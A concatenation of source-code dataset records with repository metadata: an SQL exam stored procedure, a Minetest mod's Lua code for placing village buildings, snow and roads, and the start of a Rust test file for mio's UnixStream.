on (c.customer_id=p.customer_id)
GROUP BY first_name,last_name
ORDER BY last_name; | 28.792593 | 717 | 0.752508 | 3.09375 |
618a0366f180ec51c4a6cb43f27cc9a4911e8436 | 854 | sql | SQL | Database Basics/MSSQL Server Exam - 22 October 2017/MSSQL Server Exam - 22 October 2017/18. Assign Employee .sql | stoyanovmiroslav/CSharp-DB-Fundamentals-SoftUni | d764eead3f40c608d4caf55d5f9d3d96cbeccf93 | [
"MIT"
] | 2 | 2019-03-03T08:33:14.000Z | 2019-03-13T07:38:38.000Z | Database Basics/MSSQL Server Exam - 22 October 2017/MSSQL Server Exam - 22 October 2017/18. Assign Employee .sql | stoyanovmiroslav/CSharp-DB-Fundamentals-SoftUni | d764eead3f40c608d4caf55d5f9d3d96cbeccf93 | [
"MIT"
] | null | null | null | Database Basics/MSSQL Server Exam - 22 October 2017/MSSQL Server Exam - 22 October 2017/18. Assign Employee .sql | stoyanovmiroslav/CSharp-DB-Fundamentals-SoftUni | d764eead3f40c608d4caf55d5f9d3d96cbeccf93 | [
"MIT"
] | 2 | 2019-02-06T10:12:00.000Z | 2019-02-06T10:30:14.000Z | CREATE PROC usp_AssignEmployeeToReport(@employeeId INT, @reportId INT)
AS
BEGIN TRAN
UPDATE Reports
SET EmployeeId = @employeeId
WHERE Id = @reportId
DECLARE @EmployeeDepartmentId INT = (SELECT e.DepartmentId
FROM Employees AS e
WHERE Id = @employeeId)
DECLARE @ReportDepartmentId INT = (SELECT c.DepartmentId
FROM Reports AS r
JOIN Categories AS c
ON c.Id = r.CategoryId
WHERE r.Id = @reportId)
IF(@EmployeeDepartmentId <> @ReportDepartmentId)
BEGIN
ROLLBACK;
THROW 99001, 'Employee doesn''t belong to the appropriate department!', 1;
RETURN
END
COMMIT
EXEC usp_AssignEmployeeToReport 17, 2;
SELECT EmployeeId FROM Reports WHERE id = 2 | 31.62963 | 80 | 0.593677 | 3.015625 |
6db527cd014d265161e70cc8dcc13b7a2e6db1ac | 22,127 | lua | Lua | mg_villages/place_buildings.lua | maikerumine/mc2plus | 0d48f79d0cc3fca0be78c015e0d2b306dca16332 | [
"MIT"
] | 2 | 2017-08-07T09:51:48.000Z | 2019-10-26T18:53:18.000Z | mg_villages/place_buildings.lua | maikerumine/mc2plus | 0d48f79d0cc3fca0be78c015e0d2b306dca16332 | [
"MIT"
] | 3 | 2017-08-08T19:42:27.000Z | 2017-11-30T18:25:34.000Z | mg_villages/place_buildings.lua | maikerumine/mc2plus | 0d48f79d0cc3fca0be78c015e0d2b306dca16332 | [
"MIT"
] | null | null | null |
-- Read a node either from the voxelmanip buffers (fast path) or via
-- minetest.get_node_or_nil (slow path). Returns a table with at least
-- .content (content id) and .param2; the slow path adds .name as well.
-- The function might as well be local (only used by *.mg_drop_moresnow).
mg_villages.get_node_somehow = function( x, y, z, a, data, param2_data )
	-- fast path: all three voxelmanip handles are present
	if( a and data and param2_data ) then
		local vi = a:index(x, y, z);
		return { content = data[vi], param2 = param2_data[vi] };
	end
	-- slow path: query the map directly
	local node = minetest.get_node_or_nil( {x=x, y=y, z=z} );
	if( node ) then
		return { content = minetest.get_content_id( node.name ), param2 = node.param2, name = node.name };
	end
	-- the node is not loaded/emerged yet
	return { content = moresnow.c_ignore, param2 = 0 };
end
-- "drop" moresnow snow on different shapes; works for voxelmanip and node-based setting.
-- Scans the column (x,z) downward from y_top to y_bottom, looking for the first
-- surface (air above a real node) that can carry a moresnow cover node.
-- Returns { height = y, suggested = <moresnow suggestion> } when a fitting
-- snow shape was found, or nil when moresnow is missing, the surface already
-- carries snow, is a road, or no fitting shape exists in the searched range.
--  x, z:                 column to check
--  y_top, y_bottom:      vertical search range (inclusive, top down)
--  a, data, param2_data: optional voxelmanip handles; without them the map is queried directly
mg_villages.mg_drop_moresnow = function( x, z, y_top, y_bottom, a, data, param2_data)
	-- this only works if moresnow is installed
	if( not( mg_villages.moresnow_installed )) then
		return;
	end

	local y = y_top;
	local node_above = mg_villages.get_node_somehow( x, y+1, z, a, data, param2_data );
	local node_below = nil;
	-- walk downward until a surface below air is found
	while( y >= y_bottom ) do

		node_below = mg_villages.get_node_somehow( x, y, z, a, data, param2_data );
		-- a candidate surface needs air above and a real (non-air, non-ignore) node below
		if(     node_above.content == moresnow.c_air
		    and node_below.content
		    and node_below.content ~= moresnow.c_ignore
		    and node_below.content ~= moresnow.c_air ) then

			-- if the node below drops snow when digged (i.e. is either snow or a moresnow node), we're finished
			local get_drop = minetest.get_name_from_content_id( node_below.content );
			if( get_drop ) then
				get_drop = minetest.registered_nodes[ get_drop ];
				if( get_drop and get_drop.drop and type( get_drop.drop )=='string' and get_drop.drop == 'default:snow') then
					return;
				end
			end
			-- roads stay free of snow, and existing snow needs no further cover
			if(  not(node_below.content)
		          or node_below.content == mg_villages.road_node
			  or node_below.content == moresnow.c_snow ) then
				return;
			end

			-- ask moresnow which snow node shape would fit on top of node_below
			local suggested = moresnow.suggest_snow_type( node_below.content, node_below.param2 );

			-- c_snow_top and c_snow_fence can only exist when the node 2 below is a solid one
			if( suggested.new_id == moresnow.c_snow_top
			  or suggested.new_id == moresnow.c_snow_fence) then
				local node_below2 = mg_villages.get_node_somehow( x, y-1, z, a, data, param2_data);
				if(     node_below2.content ~= moresnow.c_ignore
				    and node_below2.content ~= moresnow.c_air ) then
					-- only accept if the node 2 below would carry normal snow itself
					local suggested2 = moresnow.suggest_snow_type( node_below2.content, node_below2.param2 );
					if( suggested2.new_id == moresnow.c_snow ) then
						return { height = y+1, suggested = suggested };
					end
				end
			-- it is possible that this is not the right shape; if so, the snow will continue to fall down
			elseif( suggested.new_id ~= moresnow.c_ignore ) then

				return { height = y+1, suggested = suggested };
			end
			-- TODO	return; -- abort; there is no fitting moresnow shape for the node below
		end
		y = y-1;
		-- the node just examined becomes the "above" node of the next iteration
		node_above = node_below;
	end
end
-- helper function for generate_building;
-- places a marker that allows players to buy plots with houses on them
-- (in order to modify the buildings)
local function generate_building_plotmarker( pos, minp, maxp, data, param2_data, a, cid, building_nr_in_bpos, village_id)
	-- the marker sits one node above ground level, just outside the building;
	-- pos.o contains the original orientation (determined by the road and the
	-- side the building is on) and selects where "just outside" is
	local marker = {x = pos.x, y = pos.y + 1, z = pos.z};
	if(     pos.o == 0 ) then
		marker.x = marker.x - 1;
		marker.z = marker.z + pos.bsizez - 1;
	elseif( pos.o == 2 ) then
		marker.x = marker.x + pos.bsizex;
	elseif( pos.o == 1 ) then
		marker.x = marker.x + pos.bsizex - 1;
		marker.z = marker.z + pos.bsizez;
	elseif( pos.o == 3 ) then
		marker.z = marker.z - 1;
	end

	-- nothing to do if the marker falls outside the currently generated area
	if(  marker.x < minp.x or marker.x > maxp.x
	  or marker.y < minp.y or marker.y > maxp.y
	  or marker.z < minp.z or marker.z > maxp.z ) then
		return;
	end

	-- actually place the marker node, rotated like the building
	local vi = a:index( marker.x, marker.y, marker.z );
	data[        vi ] = cid.c_plotmarker;
	param2_data[ vi ] = pos.brotate;

	-- store the necessary information in the marker so that it knows
	-- for which building it is responsible
	local meta = minetest.get_meta( marker );
	meta:set_string( 'village_id', village_id );
	meta:set_int(    'plot_nr',    building_nr_in_bpos );
	meta:set_string( 'infotext',   'Plot No. '..tostring( building_nr_in_bpos )..' with '..tostring( mg_villages.BUILDINGS[pos.btype].scm ));
end
-- We do have a list of all nodenames the building contains (the .mts file
-- provided it); we can thus apply all replacements to these nodenames.
-- This also checks param2 and sets some other variables to indicate that a
-- node is i.e. a tree or a chest (which both need special handling later on).
-- Parameters:
--  nodenames:          list of node names as stored in the .mts file
--  replacements:       replacement data; replacements.table maps old name -> new name
--  cid:                table of precomputed content ids
--  binfo_scm:          name of the building schematic (only used in error messages)
--  mirror_x, mirror_z: true if the building is mirrored along that axis
-- Returns a table indexed like nodenames; each entry describes the translated
-- node (new_content, paramtype2, is_tree/is_chestlike/is_sign/... flags), or
-- carries .ignore = 1 when the node is to be left unchanged.
local function generate_building_translate_nodenames( nodenames, replacements, cid, binfo_scm, mirror_x, mirror_z )

	if( not( nodenames )) then
		return;
	end

	local new_nodes = {};
	for i,node_name in ipairs( nodenames ) do

		new_nodes[ i ] = {}; -- array for collecting information about the new content id for nodes with number "i" in their .mts savefile

		-- some nodes may be called differently when mirrored; needed for doors
		local new_node_name = node_name;
		if( new_node_name and ( mirror_x or mirror_z ) and mg_villages.mirrored_node[ new_node_name ] ) then
			new_node_name = mg_villages.mirrored_node[ new_node_name ];
			new_nodes[ i ].is_mirrored = 1; -- currently unused
		end

		-- apply the replacements
		if( new_node_name and replacements.table[ new_node_name ] ) then
			new_node_name = replacements.table[ new_node_name ];
			new_nodes[ i ].is_replaced = 1; -- currently unused
		end

		-- only existing nodes can be placed
		if( new_node_name and minetest.registered_nodes[ new_node_name ]) then

			local regnode = minetest.registered_nodes[ new_node_name ];
			new_nodes[ i ].new_node_name = new_node_name;
			new_nodes[ i ].new_content   = minetest.get_content_id( new_node_name );
			-- nodes with an on_construct callback need that callback called after placement
			if( regnode.on_construct ) then
				new_nodes[ i ].on_construct = 1;
			end

			-- flag node categories that get special handling later on
			local new_content = new_nodes[ i ].new_content;
			if( new_content == cid.c_dirt or new_content == cid.c_dirt_with_grass ) then
				new_nodes[ i ].is_grass     = 1;

			elseif( new_content == cid.c_sapling
			     or new_content == cid.c_jsapling
			     or new_content == cid.c_psapling
			     or new_content == cid.c_savannasapling
			     or new_content == cid.c_pinesapling ) then
				-- store that a tree is to be grown there
				new_nodes[ i ].is_tree      = 1;

			elseif( new_content == cid.c_chest
			     or new_content == cid.c_chest_locked
			     or new_content == cid.c_chest_shelf
			     or new_content == cid.c_chest_ash
			     or new_content == cid.c_chest_aspen
			     or new_content == cid.c_chest_birch
			     or new_content == cid.c_chest_maple
			     or new_content == cid.c_chest_chestnut
			     or new_content == cid.c_chest_pine
			     or new_content == cid.c_chest_spruce) then
				-- we're dealing with a chest that might need filling
				new_nodes[ i ].is_chestlike = 1;

			elseif( new_content == cid.c_chest_private
			     or new_content == cid.c_chest_work
			     or new_content == cid.c_chest_storage ) then
				-- we're dealing with a chest that might need filling
				new_nodes[ i ].is_chestlike = 1;
				-- TODO: perhaps use a locked chest owned by the mob living there?
				-- place a normal chest here
				new_nodes[ i ].new_content  = cid.c_chest;

			elseif( new_content == cid.c_sign ) then
				-- the sign may require some text to be written on it
				new_nodes[ i ].is_sign      = 1;
			end

			-- mg_villages.get_param2_rotated( 'facedir', param2 ) needs to be called for nodes
			-- which use either facedir or wallmounted;
			-- realtest rotates some nodes diffrently and does not come with default:ladder
			if(     node_name == 'default:ladder' and not( minetest.registered_nodes[ node_name ])) then
				-- remap realtest's ladder rotations: 2->1, 5->2, 3->3, 4->0
				new_nodes[ i ].change_param2 = {};
				new_nodes[ i ].change_param2[2] = 1;
				new_nodes[ i ].change_param2[5] = 2;
				new_nodes[ i ].change_param2[3] = 3;
				new_nodes[ i ].change_param2[4] = 0;
				new_nodes[ i ].paramtype2 = 'facedir';
			-- stairs and doors always rotate like facedir nodes
			elseif( string.sub( node_name, 1, 7 ) == 'stairs:' or string.sub( node_name, 1, 6 ) == 'doors:') then
				new_nodes[ i ].paramtype2 = 'facedir';
			-- normal nodes
			elseif( regnode and regnode.paramtype2 and (regnode.paramtype2=='facedir' or regnode.paramtype2=='wallmounted')) then
				new_nodes[ i ].paramtype2 = regnode.paramtype2;
			end

		-- we tried our best, but the replacement node is not defined
		elseif( new_node_name ~= 'mg:ignore' ) then
			mg_villages.print( mg_villages.DEBUG_LEVEL_WARNING, 'ERROR: Did not find a suitable replacement for '..tostring( node_name )..' (suggested but inexistant: '..tostring( new_node_name )..'). Building: '..tostring( binfo_scm )..'.');
			new_nodes[ i ].ignore = 1; -- keep the old content
		else -- handle mg:ignore
			new_nodes[ i ].ignore = 1;
		end
	end
	return new_nodes;
end
-- Writes one building (a .we schematic parsed into binfo.scm_data_cache)
-- into the voxelmanip buffers `data`/`param2_data` (indexed through `a`).
-- Handles the four rotations (pos.brotate 0..3), optional mirroring, node-id
-- replacements and snow detection, and records deferred work (on_construct
-- calls, trees, chests, signs) in `extra_calls` for later processing.
-- Buildings of .mts type and buildings fully outside minp..maxp are skipped.
local function generate_building(pos, minp, maxp, data, param2_data, a, extranodes, replacements, cid, extra_calls, building_nr_in_bpos, village_id)
	local binfo = mg_villages.BUILDINGS[pos.btype]
	local scm
	-- the building got removed from mg_villages.BUILDINGS in the meantime
	if( not( binfo )) then
		return;
	end
	-- schematics of .mts type are not handled here; they need to be placed using place_schematics
	if( binfo.is_mts == 1 ) then
		return;
	end
	-- skip building if it is not located at least partly in the area that is currently beeing generated
	if( pos.x > maxp.x or pos.x + pos.bsizex < minp.x
	 or pos.z > maxp.z or pos.z + pos.bsizez < minp.z ) then
		return;
	end
	-- sanity check: the stored position data has to match the size of the known schematic
	if( pos.btype ~= "road" and
	    (( binfo.sizex ~= pos.bsizex and binfo.sizex ~= pos.bsizez )
	      or ( binfo.sizez ~= pos.bsizex and binfo.sizez ~= pos.bsizez )
	      or not( binfo.scm_data_cache ))) then
		mg_villages.print( mg_villages.DEBUG_LEVEL_WARNING, 'ERROR: This village was created using diffrent buildings than those known know. Cannot place unknown building.');
		return;
	end
	if( binfo.scm_data_cache )then
		scm = binfo.scm_data_cache;
	else
		scm = binfo.scm
	end
	-- the fruit is set per building, not per village as the other replacements
	if( binfo.farming_plus and binfo.farming_plus == 1 and pos.fruit ) then
		mg_villages.get_fruit_replacements( replacements, pos.fruit);
	end
	-- content ids needed for the ground/snow handling below
	local c_ignore = minetest.get_content_id("ignore")
	local c_air = minetest.get_content_id("air")
	local c_snow = minetest.get_content_id( "default:snow");
	local c_dirt = minetest.get_content_id( "default:dirt" );
	local c_dirt_with_grass = minetest.get_content_id( "default:dirt_with_grass" );
	local c_dirt_with_snow = minetest.get_content_id( "default:dirt_with_snow" );
	-- set up schematic iteration; rotations 1 and 2 walk the schematic backwards
	local scm_x = 0;
	local scm_z = 0;
	local step_x = 1;
	local step_z = 1;
	local scm_z_start = 0;
	if( pos.brotate == 2 ) then
		scm_x = pos.bsizex+1;
		step_x = -1;
	end
	if( pos.brotate == 1 ) then
		scm_z = pos.bsizez+1;
		step_z = -1;
		scm_z_start = scm_z;
	end
	-- which axis gets mirrored depends on the building's own orientation (binfo.axis)
	local mirror_x = false;
	local mirror_z = false;
	if( pos.mirror ) then
		if( binfo.axis and binfo.axis == 1 ) then
			mirror_x = true;
			mirror_z = false;
		else
			mirror_x = false;
			mirror_z = true;
		end
	end
	-- translate all nodenames and apply the replacements
	local new_nodes = generate_building_translate_nodenames( binfo.nodenames, replacements, cid, binfo.scm, mirror_x, mirror_z );
	for x = 0, pos.bsizex-1 do
		scm_x = scm_x + step_x;
		scm_z = scm_z_start;
		for z = 0, pos.bsizez-1 do
			scm_z = scm_z + step_z;
			-- map the world-relative (x,z) cell to schematic coordinates,
			-- taking rotation and mirroring into account
			local xoff = scm_x;
			local zoff = scm_z;
			if( pos.brotate == 2 ) then
				if( mirror_x ) then
					xoff = pos.bsizex - scm_x + 1;
				end
				if( mirror_z ) then
					zoff = scm_z;
				else
					zoff = pos.bsizez - scm_z + 1;
				end
			elseif( pos.brotate == 1 ) then
				if( mirror_x ) then
					xoff = pos.bsizez - scm_z + 1;
				else
					xoff = scm_z;
				end
				if( mirror_z ) then
					zoff = pos.bsizex - scm_x + 1;
				else
					zoff = scm_x;
				end
			elseif( pos.brotate == 3 ) then
				if( mirror_x ) then
					xoff = pos.bsizez - scm_z + 1;
				else
					xoff = scm_z;
				end
				if( mirror_z ) then
					zoff = scm_x;
				else
					zoff = pos.bsizex - scm_x + 1;
				end
			elseif( pos.brotate == 0 ) then
				if( mirror_x ) then
					xoff = pos.bsizex - scm_x + 1;
				end
				if( mirror_z ) then
					zoff = pos.bsizez - scm_z + 1;
				end
			end
			local has_snow = false;
			local ground_type = c_dirt_with_grass;
			for y = 0, binfo.ysize-1 do
				local ax = pos.x+x;
				local ay = pos.y+y+binfo.yoff;
				local az = pos.z+z;
				-- only touch nodes that lie inside the currently generated chunk
				if (ax >= minp.x and ax <= maxp.x) and (ay >= minp.y and ay <= maxp.y) and (az >= minp.z and az <= maxp.z) then
					local new_content = c_air;
					local t = scm[y+1][xoff][zoff];
					-- at ground level: remember the terrain type and whether it carried snow
					if( binfo.yoff+y == 0 ) then
						local node_content = data[a:index(ax, ay, az)];
						-- no snow on the gravel roads
						if( node_content == c_dirt_with_snow or data[a:index(ax, ay+1, az)]==c_snow) then
							has_snow = true;
						end
						ground_type = node_content;
					end
					-- a {node_id, param2} pair from the schematic
					if( t and type(t)=='table' and #t==2 and t[1] and t[2]) then
						local n = new_nodes[ t[1] ]; -- t[1]: id of the old node
						if( not( n.ignore )) then
							new_content = n.new_content;
						end
						-- replace all dirt and dirt with grass at that x,z coordinate with the stored ground grass node;
						if( n.is_grass ) then
							new_content = ground_type;
						end
						if( n.on_construct ) then
							if( not( extra_calls.on_constr[ new_content ] )) then
								extra_calls.on_constr[ new_content ] = { {x=ax, y=ay, z=az}};
							else
								table.insert( extra_calls.on_constr[ new_content ], {x=ax, y=ay, z=az});
							end
						end
						-- do not overwrite plotmarkers
						if( new_content ~= cid.c_air or data[ a:index(ax,ay,az)] ~= cid.c_plotmarker ) then
							data[ a:index(ax, ay, az)] = new_content;
						end
						-- store that a tree is to be grown there
						if( n.is_tree ) then
							table.insert( extra_calls.trees, {x=ax, y=ay, z=az, typ=new_content, snow=has_snow});
						-- we're dealing with a chest that might need filling
						elseif( n.is_chestlike ) then
							table.insert( extra_calls.chests, {x=ax, y=ay, z=az, typ=new_content, bpos_i=building_nr_in_bpos});
						-- the sign may require some text to be written on it
						elseif( n.is_sign ) then
							table.insert( extra_calls.signs, {x=ax, y=ay, z=az, typ=new_content, bpos_i=building_nr_in_bpos});
						end
						-- handle rotation
						if( n.paramtype2 ) then
							local param2 = t[2];
							if( n.change_param2 and n.change_param2[ t[2] ]) then
								param2 = n.change_param2[ param2 ];
							end
							-- look the rotated/mirrored param2 up in the precomputed rotation_table
							local np2 = 0;
							if( mirror_x ) then
								np2 = rotation_table[ n.paramtype2 ][ param2+1 ][ pos.brotate+1 ][ 2 ];
							elseif( mirror_z ) then
								np2 = rotation_table[ n.paramtype2 ][ param2+1 ][ pos.brotate+1 ][ 3 ];
							else
								np2 = rotation_table[ n.paramtype2 ][ param2+1 ][ pos.brotate+1 ][ 1 ];
							end
							--[[ (older manual rotation code, kept for reference)
							local param2list = mg_villages.get_param2_rotated( n.paramtype2, param2);
							local np2 = param2list[ pos.brotate + 1];
							-- mirror
							if( mirror_x ) then
								if( #param2list==5) then
									np2 = mg_villages.mirror_facedir[ ((pos.brotate+1)%2)+1 ][ np2+1 ];
								elseif( #param2list<5
								  and ((pos.brotate%2==1 and (np2==4 or np2==5))
								    or (pos.brotate%2==0 and (np2==2 or np2==3)))) then
									np2 = param2list[ (pos.brotate + 2)%4 +1];
								end
							elseif( mirror_z ) then
								if( #param2list==5) then
									np2 = mg_villages.mirror_facedir[ (pos.brotate %2)+1 ][ np2+1 ];
								elseif( #param2list<5
								  and ((pos.brotate%2==0 and (np2==4 or np2==5))
								    or (pos.brotate%2==1 and (np2==2 or np2==3)))) then
									np2 = param2list[ (pos.brotate + 2)%4 +1];
								end
							end
							--]]
							param2_data[a:index(ax, ay, az)] = np2;
						else
							param2_data[a:index(ax, ay, az)] = t[2];
						end
					-- air and gravel (the road is structured like this)
					elseif (type(t) ~= 'table' and t ~= c_ignore) then
						new_content = t;
						if( t and replacements.ids[ t ] ) then
							new_content = replacements.ids[ t ];
						end
						if( t and t==c_dirt or t==c_dirt_with_grass ) then
							new_content = ground_type;
						end
						if( data[a:index(ax,ay,az)]==c_snow ) then
							has_snow = true;
						end
						data[a:index(ax, ay, az)] = new_content;
						-- param2 is not set here
					end
				end
			end
			-- after the whole column has been placed: if the terrain originally
			-- carried snow, try to put a suitable snow cover back on top
			local ax = pos.x + x;
			local az = pos.z + z;
			local y_top = pos.y+binfo.yoff+binfo.ysize;
			if( y_top+1 > maxp.y ) then
				y_top = maxp.y-1;
			end
			local y_bottom = pos.y+binfo.yoff;
			if( y_bottom < minp.y ) then
				y_bottom = minp.y;
			end
			if( has_snow and ax >= minp.x and ax <= maxp.x and az >= minp.z and az <= maxp.z ) then
				local res = mg_villages.mg_drop_moresnow( ax, az, y_top, y_bottom-1, a, data, param2_data);
				if( res and data[ a:index(ax, res.height, az)]==cid.c_air) then
					data[ a:index(ax, res.height, az)] = res.suggested.new_id;
					param2_data[a:index(ax, res.height, az)] = res.suggested.param2;
					has_snow = false;
				end
			end
		end
	end
end
-- actually place the buildings (at least those which came as .we files; .mts files are handled later on)
-- this code is also responsible for tree placement
-- Returns a table with everything that still has to be applied after the
-- voxelmanip data has been written back: extranodes, the replacement list,
-- dirt roads, the plant list and the collected extra_calls.
mg_villages.place_buildings = function(village, minp, maxp, data, param2_data, a, cid, village_id)
	local vx, vz, vs, vh = village.vx, village.vz, village.vs, village.vh
	local village_type = village.village_type;
	local seed = mg_villages.get_bseed({x=vx, z=vz})
	local bpos = village.to_add_data.bpos;
	village.to_grow = {}; -- TODO this is a temporal solution to avoid flying tree trunks
	--generate_walls(bpos, data, a, minp, maxp, vh, vx, vz, vs, vnoise)
	local pr = PseudoRandom(seed)
	-- NOTE(review): village.to_grow was just reset to {} above, so this loop
	-- is currently a no-op; kept because of the TODO above.
	for _, g in ipairs(village.to_grow) do
		if pos_far_buildings(g.x, g.z, bpos) then
			mg.registered_trees[g.id].grow(data, a, g.x, g.y, g.z, minp, maxp, pr)
		end
	end
	local replacements = mg_villages.get_replacement_table( village.village_type, nil, village.to_add_data.replacements );
	-- cache the (possibly replaced) content ids of all node types that get
	-- special treatment later on (chest filling, sign texts)
	cid.c_chest = mg_villages.get_content_id_replaced( 'default:chest', replacements );
	cid.c_chest_locked = mg_villages.get_content_id_replaced( 'default:chest_locked', replacements );
	cid.c_chest_private = mg_villages.get_content_id_replaced( 'cottages:chest_private', replacements );
	cid.c_chest_work = mg_villages.get_content_id_replaced( 'cottages:chest_work', replacements );
	cid.c_chest_storage = mg_villages.get_content_id_replaced( 'cottages:chest_storage', replacements );
	cid.c_chest_shelf = mg_villages.get_content_id_replaced( 'cottages:shelf', replacements );
	cid.c_chest_ash = mg_villages.get_content_id_replaced( 'trees:chest_ash', replacements );
	cid.c_chest_aspen = mg_villages.get_content_id_replaced( 'trees:chest_aspen', replacements );
	cid.c_chest_birch = mg_villages.get_content_id_replaced( 'trees:chest_birch', replacements );
	cid.c_chest_maple = mg_villages.get_content_id_replaced( 'trees:chest_maple', replacements );
	cid.c_chest_chestnut = mg_villages.get_content_id_replaced( 'trees:chest_chestnut', replacements );
	cid.c_chest_pine = mg_villages.get_content_id_replaced( 'trees:chest_pine', replacements );
	cid.c_chest_spruce = mg_villages.get_content_id_replaced( 'trees:chest_spruce', replacements );
	cid.c_sign = mg_villages.get_content_id_replaced( 'default:sign_wall', replacements );
	--print('REPLACEMENTS: '..minetest.serialize( replacements.table )..' CHEST: '..tostring( minetest.get_name_from_content_id( cid.c_chest ))); -- TODO
	local extranodes = {}
	local extra_calls = { on_constr = {}, trees = {}, chests = {}, signs = {} };
	-- count the buildings
	local anz_buildings = 0;
	for i, pos in ipairs(bpos) do
		if( pos.btype and not(pos.btype == 'road' )) then
			local binfo = mg_villages.BUILDINGS[pos.btype];
			-- count buildings which can house inhabitants as well as those requiring workers
			if( binfo and binfo.inh and binfo.inh ~= 0 ) then
				anz_buildings = anz_buildings + 1;
			end
		end
	end
	village.anz_buildings = anz_buildings;
	for i, pos in ipairs(bpos) do
		-- roads are only placed if there are at least mg_villages.MINIMAL_BUILDUNGS_FOR_ROAD_PLACEMENT buildings in the village
		if( not(pos.btype) or pos.btype ~= 'road' or anz_buildings > mg_villages.MINIMAL_BUILDUNGS_FOR_ROAD_PLACEMENT )then
			-- replacements are in table format for mapgen-based building spawning
			generate_building(pos, minp, maxp, data, param2_data, a, extranodes, replacements, cid, extra_calls, i, village_id )
		end
	end
	-- replacements are in list format for minetest.place_schematic(..) type spawning
	return { extranodes = extranodes, bpos = bpos, replacements = replacements.list, dirt_roads = village.to_add_data.dirt_roads,
		plantlist = village.to_add_data.plantlist, extra_calls = extra_calls };
end
-- add the dirt roads
-- Each road segment is one node high, is covered by two air nodes, and its
-- param2 encodes the orientation (1 for segments wider than two nodes along
-- x, else 0).
mg_villages.place_dirt_roads = function(village, minp, maxp, data, param2_data, a, c_road_node)
	local c_air = minetest.get_content_id( 'air' );
	for _, road in ipairs(village.to_add_data.dirt_roads) do
		local road_param2 = 0;
		if( road.bsizex > 2 ) then
			road_param2 = 1;
		end
		local ry = road.y;
		-- the road node plus two air nodes above it have to fit into this chunk
		if( ry >= minp.y and ry <= maxp.y-2 ) then
			for dx = 0, road.bsizex-1 do
				local ax = road.x + dx;
				if( ax >= minp.x and ax <= maxp.x ) then
					for dz = 0, road.bsizez-1 do
						local az = road.z + dz;
						if( az >= minp.z and az <= maxp.z ) then
							-- roads have a height of 1 block
							data[ a:index( ax, ry, az)] = c_road_node;
							param2_data[ a:index( ax, ry, az)] = road_param2;
							-- ...with air above
							data[ a:index( ax, ry+1, az)] = c_air;
							data[ a:index( ax, ry+2, az)] = c_air;
						end
					end
				end
			end
		end
	end
end
-- optional dependency: remember whether the moresnow mod is available so
-- that the snow-cover code can make use of it
if( minetest.get_modpath('moresnow' )) then
	mg_villages.moresnow_installed = true;
end
| 37.50339 | 233 | 0.66733 | 3 |
74227eda1614f2d5f3ab3b90f5f686b3003559e2 | 17,098 | rs | Rust | tests/unix_stream.rs | stevenroose/mio | ac0515cc9519f228d39bb0d9055955faf7f75f34 | [
"MIT"
] | null | null | null | tests/unix_stream.rs | stevenroose/mio | ac0515cc9519f228d39bb0d9055955faf7f75f34 | [
"MIT"
] | null | null | null | tests/unix_stream.rs | stevenroose/mio | ac0515cc9519f228d39bb0d9055955faf7f75f34 | [
"MIT"
] | null | null | null | #![cfg(unix)]
#[macro_use]
mod util;
use log::warn;
use mio::net::UnixStream;
use mio::{Interests, Token};
use std::io::{self, IoSlice, IoSliceMut, Read, Write};
use std::net::Shutdown;
use std::os::unix::net;
use std::path::Path;
use std::sync::mpsc::channel;
use std::sync::{Arc, Barrier};
use std::thread;
use std::time::Duration;
use tempdir::TempDir;
use util::{
assert_send, assert_sync, assert_would_block, expect_events, expect_no_events, init_with_poll,
ExpectEvent, TryRead, TryWrite,
};
// Payloads exchanged between the peers in these tests, with their lengths.
const DATA1: &[u8] = b"Hello same host!";
const DATA2: &[u8] = b"Why hello mio!";
const DATA1_LEN: usize = 16;
const DATA2_LEN: usize = 14;

// Scratch-buffer size used by every read in this file.
const DEFAULT_BUF_SIZE: usize = 64;

// Poll registration tokens for the (at most two) streams under test.
const TOKEN_1: Token = Token(0);
const TOKEN_2: Token = Token(1);
// Compile-time check that `UnixStream` is usable across threads.
#[test]
fn unix_stream_send_and_sync() {
    assert_send::<UnixStream>();
    assert_sync::<UnixStream>();
}
// Basic read/write round-trip using `UnixStream::connect`.
#[test]
fn unix_stream_smoke() {
    #[allow(clippy::redundant_closure)]
    smoke_test(|path| UnixStream::connect(path));
}
// A connecting stream must become writable once accepted, and readable once
// the remote side drops the connection.
#[test]
fn unix_stream_connect() {
    let (mut poll, mut events) = init_with_poll();
    let barrier = Arc::new(Barrier::new(2));

    let dir = assert_ok!(TempDir::new("unix"));
    let path = dir.path().join("any");

    let listener = assert_ok!(net::UnixListener::bind(path.clone()));
    let stream = assert_ok!(UnixStream::connect(path));

    // The accepting thread keeps the connection open until we have observed
    // the WRITABLE event, then drops it.
    let barrier_clone = barrier.clone();
    let handle = thread::spawn(move || {
        let (stream, _) = assert_ok!(listener.accept());
        barrier_clone.wait();
        drop(stream);
    });

    assert_ok!(poll.registry().register(
        &stream,
        TOKEN_1,
        Interests::READABLE | Interests::WRITABLE
    ));
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
    );

    barrier.wait();
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::READABLE)],
    );

    assert_ok!(handle.join());
}
// Wrapping an already-connected `std` stream must behave like a native mio
// connect (exercised via `smoke_test`).
#[test]
fn unix_stream_from_std() {
    smoke_test(|path| {
        let local = assert_ok!(net::UnixStream::connect(path));
        // `std::os::unix::net::UnixStream`s are blocking by default, so make sure
        // it is in non-blocking mode before wrapping in a Mio equivalent.
        assert_ok!(local.set_nonblocking(true));
        Ok(UnixStream::from_std(local))
    })
}
// Echo data in both directions over a socketpair created with
// `UnixStream::pair`.
#[test]
fn unix_stream_pair() {
    let (mut poll, mut events) = init_with_poll();

    let (mut s1, mut s2) = assert_ok!(UnixStream::pair());
    assert_ok!(poll
        .registry()
        .register(&s1, TOKEN_1, Interests::READABLE | Interests::WRITABLE));
    assert_ok!(poll
        .registry()
        .register(&s2, TOKEN_2, Interests::READABLE | Interests::WRITABLE));
    expect_events(
        &mut poll,
        &mut events,
        vec![ExpectEvent::new(TOKEN_1, Interests::WRITABLE)],
    );

    // Nothing has been written yet, so a read must not block.
    let mut buf = [0; DEFAULT_BUF_SIZE];
    assert_would_block(s1.read(&mut buf));

    let wrote = assert_ok!(s1.write(&DATA1));
    assert_eq!(wrote, DATA1_LEN);
    assert_ok!(s1.flush());

    let read = assert_ok!(s2.read(&mut buf));
    // A second read must hit WouldBlock: the payload was fully consumed.
    assert_would_block(s2.read(&mut buf));
    assert_eq!(read, DATA1_LEN);
    assert_eq!(&buf[..read], DATA1);
    assert_eq!(read, wrote, "unequal reads and writes");

